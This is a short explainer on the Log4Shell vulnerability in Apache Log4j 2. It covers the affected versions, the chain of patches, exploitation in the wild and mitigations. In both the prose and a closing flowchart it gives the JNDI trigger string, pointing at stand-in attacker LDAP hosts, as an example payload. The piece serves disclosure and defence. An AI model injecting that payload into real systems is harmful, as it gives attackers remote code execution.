Log4Shell (CVE-2021-44228).

Log4Shell is a CVSS 10.0 vulnerability in Apache Log4j 2 (versions 2.0-beta9 through 2.14.1), reported to Apache by Alibaba Cloud's Chen Zhaojun and disclosed publicly on 9 December 2021. Log4j's message-lookup feature evaluated ${...} expressions inside log strings; a ${jndi:ldap://attacker/x} value made the JVM perform a JNDI lookup, fetch a remote Java class and deserialise it — yielding remote code execution. Because Log4j is bundled in countless Java apps and appliances, any attacker-controlled value that reached a log (User-Agent, search box, filename, even an iPhone device name) became a trigger.

Patching was a multi-stage scramble: 2.15.0 disabled lookups but was incomplete (CVE-2021-45046), 2.16.0 removed message lookups, 2.17.0 fixed a DoS (CVE-2021-45105), and 2.17.1 addressed CVE-2021-44832 — the recommended fixed release for Java 8. Mass exploitation began within hours; CISA added it to the KEV catalog and it was abused by ransomware crews and the Iranian state actor behind intrusions into U.S. networks. Defences: upgrade to 2.17.1+ (or 2.12.4 / 2.3.2 for older Java), set log4j2.formatMsgNoLookups=true, strip the JndiLookup class, block outbound LDAP/RMI egress, and use an SBOM to locate every embedded copy.

flowchart TD
  A[Attacker] -->|"input: ${jndi:ldap://evil/x}"| B[Java app logs the string]
  B --> C[Log4j evaluates lookup]
  C --> D[JNDI query to attacker LDAP server]
  D --> E[Server returns malicious Java class URL]
  E --> F[JVM downloads & deserialises class]
  F --> G[Remote code execution]